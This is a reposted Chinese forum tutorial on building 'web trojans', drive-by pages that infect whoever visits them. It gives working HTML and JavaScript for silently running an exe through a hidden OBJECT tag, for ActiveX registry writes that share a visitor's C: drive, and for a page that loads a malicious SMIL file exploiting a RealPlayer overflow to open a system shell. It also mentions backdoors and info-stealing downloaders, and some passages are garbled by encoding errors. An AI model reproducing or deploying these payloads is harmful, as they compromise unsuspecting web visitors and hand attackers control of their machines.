[转载]制作网页木马
文章作者:不详大家对木马都不陌生了,它可能要算是计算机病毒史上最厉害的了,相信会使木马的人千千万万,但是有很多人苦于怎么把木马发给对方,现在随着计算机的普及,在网络上我相信很少有人会再轻易的接收对方的文件了,所以网页木马诞生了。
1.它应该算是html带动同路径下的一个exe的文件的主页了,也就是当浏览器浏览这个页面的时候,一个exe的文件就在后台自动下载并执行了,可以做一个test.html的文件在桌面,内容如下:
<script language="javascript">
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"test.exe#version=1,1,1,1\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1>网页加载中,请稍后....</H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>
再在桌面下随便找个exe的文件,名字一定要改为tset.exe,好了,这时候双击我们刚才生成的html文件,当看到“网页加载中,请稍后....”的时候,我们的那个同路径下的exe文件也被无条件执行了,这种页面的优点就是编译修改简单,但是!当你申请下了一个个人主页空间的时候,把这两个文件上传上去的时候,当你试图通过浏览器浏览你的杰作的时候,ie的安全警告跳了出来,我想没有几个人愿意乖乖的冒着风险去点“是”,好了,尽管这个网页木马在本地是多么的完美,但是放到了网上就通不过ie的安全策略了,这个小马失败了。
2.是通过ie自身的漏洞写入注册表,相信很多人经常在浏览一些主页的时候,注册表被改的乱七八糟、ie标题被改、首页被改、注册表编辑器被禁用等等,这些都是自动修改了你的注册表的网页的杰作,所以我门也可以做个页面让浏览者的硬盘完全共享,也是做个html的文件,内容如下:
script language=javascript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");
}
function init()
{
setTimeout("f()", 1000);
}
init();
</script>
当对方的浏览过这个页面的时候,他的c:就被共享了,共享后的进入方法嘛..呵呵不用说了吧,但是他虽然被共巷了,但是你还不知道谁正在看你的这个页面,他的ip又是多少你都不知道,没有关系,有个很简单的方法,去163申请一个域名的转换,如:[url]http://dhj.126.com[/url]连接目标地址里...褪枪蚕砹恿恕?/a>
这种网页木马的特点是比较安全,不宜被对方发现,但是使用麻烦需要牵扯到很多的东西。
3.也是现在最好用的一种了吧,个人认为。它是将一个小巧的exe文件作成一个.eml的文件,再用ie的漏洞让一个html的页面执行这个.eml的文件,你的那个小巧的exe文件就被执行了,由于代码过长又因每个exe文件转换后的代码不同所以不可能一一写出,下面给出一个地址[url]http://dhj.126.com[/url]实际上就是一个转...憧梢酝ü齮elnet x.x.x.x 3389来完全控制对方(这个5k的小后门是winshell5.0黑白网络有下,同时这个winshell5.0还有一个很出色的功能,就是能下载一个你事先设置好的指定路径下的一个文件,并执行他,我放置的是网络深偷,如果你的杀毒软件够厉害的话,神偷是可以被查出来的,这里只是实验,实际中可以指定很多查不到的小马,这里不阐述),有兴趣的朋友可以来试试。
这种网页木马的特点是,对方挨种率较高,除了制作麻烦一点外,没有什么缺点啦
好了所有的漏洞都是建立在系统漏洞的前提下,多升级多打补丁没有坏处 xiaocool朋友,以后有问题不用发短消息 ,哈哈,有问题可以直接跟帖子,
并不是我不喜欢人发短消息,哈哈,而是你跟帖子会被更多的人看到,这样会得到更多的精通这些问题的朋友的讨论帮助,哈哈
关于你问的第三种方法的说明,建议你搜索一下
iframe 漏洞
哈哈 REALPLAYER 网页木马制作思路
lcx
非安全第6期陈莎莎写了篇文章<<通过p2p共享影视文件抓肉鸡>>,里边的抓肉鸡主要思路是在rm影音文件中插入网页木马的url链接,用户看影音文件到某个时段弹出网页木马的url。其实,利用REALPLAYER本身的漏洞,直接做成网页木马,让用户在看rm的时候直接中马是有更好的效果。因为这样一来,此漏洞利用是与IE无关了,而且打REALPLAYER补丁的人少之又少,成功率还是很高的。只要装有REALPLAYER或暴风影音支持smil格式等播放器的用户都会中招。
2005年3月份,REALPLAYER暴出安全漏洞,大体意思是:RealPlayer事一款媒体播放器。使用者可以以基于缓冲区溢出脆弱用协调的多媒体综合语言(smil)文件形式语法分析程序,这能允许一个存心不良的攻击者在一台脆弱的机器上运行任意的代码。受影响系统: Windows RealPlayer 10.5 (6.0.12.1040-1056)、Windows RealPlayer 10 、Windows RealOne Player v2 (6.0.11.853 - 872) 、 Windows RealOne Player v2 (6.0.11.818 - 840) 、Windows RealOne Player v1 、Windows RealPlayer 8 、Windows RealPlayer Enterprise 、Mac RealPlayer 10 (10.0.0.305 - 325) 、Mac RealOne Player 、Linux RealPlayer 10 、Linux Helix Player。从这个漏洞的描述上来看,也会明白这个网页木马的可怕之处。
恶意的smil文件生成器,网上有现成的代码。如图1所示,我用编译好的real.exe生成了1个1.smil文件。
我本机装有暴风影音,打开这个1.smil,如图2所示。此时我本机就会开13579端口。netstat -an来看一下,再telnet本机13579端口试试,成功!如图3、图4所示。注意在图4中执行命令的时候,并没有回显,打完命令运行后才能看到结果的,是系统权限的。
这个漏洞的利用方法大体就是这个样子。我们现在就是利用此漏洞来制做成网页木马,让用户打开网页后就会打开本机的13579端口。其实说白了,也就是如何在网页中调用生成的smil文件。什么是smil文件呢?也就是replayer连续播放影音文件的一种调用方法。举个简单的例子,如果想连续播放两首mp3,网页代码如下:
★
<OBJECT classid="clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA" WIDTH="256" HEIGHT="64">
<PARAM NAME="_ExtentX" VALUE="9313">
<PARAM NAME="_ExtentY" VALUE="1588">
<PARAM NAME="AUTOSTART" VALUE="-1">
<PARAM NAME="SHUFFLE" VALUE="0">
<PARAM NAME="PREFETCH" VALUE="0">
<PARAM NAME="NOLABELS" VALUE="0">
<PARAM NAME="SRC" VALUE="Real.smil">
<PARAM NAME="CONTROLS" VALUE="ControlPanel,StatusBar">
<PARAM NAME="CONSOLE" VALUE="Clip">
<PARAM NAME="LOOP" VALUE="1">
<PARAM NAME="NUMLOOP">
<PARAM NAME="CENTER">
<PARAM NAME="MAINTAINASPECT" VALUE="0">
</OBJECT>
============================请把以上内容保存成htm或html文件
Real.smil文件的内容:
<smil>
<head>
<layout>
<region id="oRegion" left="0" top="0" />
</layout>
</head>
<body>
<seq>
<video region="oReal" src="001.mp3" />
<video region="oReal" src="002.mp3" />
</seq>
</body>
</smil>
============================001.mp3和002.mp3(或其它媒体格式)与你保存的htm文件还有Real.smil放在同一目录下
★
根据我以上的代码做完后,你再用网页打开你做好的htm文件就可以在网页中调用一些影音播放器播放001.mp3和002.mp3了。那有了这么多的代码与理论基础了,你会做网页木马了吗?做网页木马就简单多了,怕菜鸟还是不明白,再写一次代码吧:
★
===========REALPLAYER 网页木马代码开始==============================
<OBJECT classid="clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA" WIDTH="256" HEIGHT="64">
<PARAM NAME="_ExtentX" VALUE="9313">
<PARAM NAME="_ExtentY" VALUE="1588">
<PARAM NAME="AUTOSTART" VALUE="-1">
<PARAM NAME="SHUFFLE" VALUE="0">
<PARAM NAME="PREFETCH" VALUE="0">
<PARAM NAME="NOLABELS" VALUE="0">
<PARAM NAME="SRC" VALUE="你用real.exe生成的恶意smil文件的名字,如1.smil">
<PARAM NAME="CONTROLS" VALUE="ControlPanel,StatusBar">
<PARAM NAME="CONSOLE" VALUE="Clip">
<PARAM NAME="LOOP" VALUE="1">
<PARAM NAME="NUMLOOP">
<PARAM NAME="CENTER">
<PARAM NAME="MAINTAINASPECT" VALUE="0">
</OBJECT>
===========REALPLAYER 网页木马代码结束==============================
★
方法就是这样简单,一个htm文件加一个恶意的smil文件就全部结束了。如果你想把网页木马改成反弹端口或下载执行exe的,那就要看你构造恶意的smil文件的shellcode水平了。我这里只是提供了一个思路,至于如何完美打造这个REALPLAYER 网页木马,大家各自研究吧。你也要可以用我的思路,利用非安全6期陈莎莎的那篇文章制作的恶意rm文件改成网页调用的方式,估计也会这功。而且,这都是正常的htm代码,杀毒软件不会去杀这段htm代码的。另外,附个小知识,REALPLAYER的网页参数:
★
一些REAL文件参数:
AUTOSTART 自动播放:true|false 默认:false
CENTER 放在中间位置 true|false 默认:false
CONSOLE 连接多种格式 name, _master, or _unique 默认:无
CONTROLS 播放面板的按钮和MTV、电影窗口 按钮的名字(PlayButton,PlayOnlyButton,StopButton,FFCtrl, RWCtrl,MuteCtrl,VolumeSlider,ImageWindow ) 默认:全部按钮
HEIGHT 高度,单位是百分比或者象素,默认:0
WIDTH 宽度,单位是百分比或者象素,默认:0
LOOP 自动重放 true|false 默认:false
MAINTAINASPECT 预留图象窗口. true|false 默认:false
NOJAVA 防止JVM跳出来. no true|false 默认:false
NOLABELS 不显示播放器的一些信息true|false 默认:false
NOLOGO 不显示Real的LOGO true|false 默认:false //Real很霸道这句我从来没有改成过,你怎么改还是认为是 true
NUMLOOP 指定某段片段的反复播放 any number 默认:无
REGION 绑定SMIL区域. SMIL region 默认:无
SHUFFLE 随机播放某段 true|false 默认:false
SRC 文件连接地址
BACKGROUNDCOLOR 背景颜色:颜色的英文名或者RGB数值 默认:黑色
★
页:
[1]